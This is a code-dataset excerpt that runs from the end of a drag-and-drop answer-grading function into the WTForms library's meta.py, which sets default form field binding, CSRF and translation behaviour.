self.correct_groups.append(answer['draggables'])
self.correct_positions.append({answer['rule']: answer['targets']})
self.user_groups.append(user_groups_data)
self.user_positions.append({'user': user_positions_data})
def grade(user_input, correct_answer):
""" Creates DragAndDrop instance from user_input and correct_answer and
calls DragAndDrop.grade for grading.
Supports two interfaces for correct_answer: dict and list.
Args:
user_input: json. Format::
{ "draggables":
[{"1": [10, 10]}, {"name_with_icon": [20, 20]}]}'
or
{"draggables": [{"1": "t1"}, \
{"name_with_icon": "t2"}]}
correct_answer: dict or list.
Dict form::
{'1': 't1', 'name_with_icon': 't2'}
or
{'1': '[10, 10]', 'name_with_icon': '[[10, 10], 20]'}
List form::
correct_answer = [
{
'draggables': ['l3_o', 'l10_o'],
'targets': ['t1_o', 't9_o'],
'rule': 'anyof'
},
{
'draggables': ['l1_c','l8_c'],
'targets': ['t5_c','t6_c'],
'rule': 'anyof'
}
]
Returns: bool
"""
return DragAndDrop(correct_answer=correct_answer,
user_answer=user_input).grade()
|
agpl-3.0
|
initNirvana/Easyphotos
|
env/lib/python3.4/site-packages/wtforms/meta.py
|
114
|
3684
|
from wtforms.utils import WebobInputWrapper
from wtforms import i18n
class DefaultMeta(object):
"""
This is the default Meta class which defines all the default values and
therefore also the 'API' of the class Meta interface.
"""
# -- Basic form primitives
def bind_field(self, form, unbound_field, options):
"""
bind_field allows potential customization of how fields are bound.
The default implementation simply passes the options to
:meth:`UnboundField.bind`.
:param form: The form.
:param unbound_field: The unbound field.
:param options:
A dictionary of options which are typically passed to the field.
:return: A bound field
"""
return unbound_field.bind(form=form, **options)
def wrap_formdata(self, form, formdata):
"""
wrap_formdata allows doing custom wrappers of WTForms formdata.
The default implementation detects webob-style multidicts and wraps
        them; otherwise it passes formdata back unchanged.
:param form: The form.
:param formdata: Form data.
:return: A form-input wrapper compatible with WTForms.
"""
if formdata is not None and not hasattr(formdata, 'getlist'):
if hasattr(formdata, 'getall'):
return WebobInputWrapper(formdata)
else:
raise TypeError("formdata should be a multidict-type wrapper that supports the 'getlist' method")
return formdata
def render_field(self, field, render_kw):
"""
render_field allows customization of how widget rendering is done.
The default implementation calls ``field.widget(field, **render_kw)``
"""
return field.widget(field, **render_kw)
# -- CSRF
csrf = False
csrf_field_name = 'csrf_token'
csrf_secret = None
csrf_context = None
csrf_class = None
def build_csrf(self, form):
"""
Build a CSRF implementation. This is called once per form instance.
The default implementation builds the class referenced to by
:attr:`csrf_class` with zero arguments. If `csrf_class` is ``None``,
will instead use the default implementation
:class:`wtforms.csrf.session.SessionCSRF`.
:param form: The form.
:return: A CSRF implementation.
"""
if self.csrf_class is not None:
return self.csrf_class()
from wtforms.csrf.session import SessionCSRF
return SessionCSRF()
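    # For example (hypothetical, not part of the original file), a form could
    # point csrf_class at a custom implementation instead of SessionCSRF:
    #
    #     class Meta:
    #         csrf = True
    #         csrf_class = MyCustomCSRF   # invented name; must implement the CSRF API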
# -- i18n
locales = False
cache_translations = True
translations_cache = {}
def get_translations(self, form):
"""
Override in subclasses to provide alternate translations factory.
See the i18n documentation for more.
:param form: The form.
:return: An object that provides gettext() and ngettext() methods.
"""
locales = self.locales
if locales is False:
return None
if self.cache_translations:
# Make locales be a hashable value
locales = tuple(locales) if locales else None
translations = self.translations_cache.get(locales)
if translations is None:
translations = self.translations_cache[locales] = i18n.get_translations(locales)
return translations
return i18n.get_translations(locales)
# -- General
def update_values(self, values):
"""
Given a dictionary of values, update values on this `Meta` instance.
"""
for key, value in values.items():
setattr(self, key, value)
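# A minimal usage sketch (hypothetical, not part of the original file): these
# defaults are normally overridden through a form's inner Meta class, which
# WTForms layers on top of DefaultMeta.
#
#     from wtforms import Form, StringField
#
#     class SignupForm(Form):
#         class Meta:
#             csrf = True                 # build_csrf() falls back to SessionCSRF
#             csrf_secret = b'change me'  # required by SessionCSRF
#             locales = ('de_DE', 'de')   # resolved and cached by get_translations()
#
#         name = StringField('Name')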
|
mit
|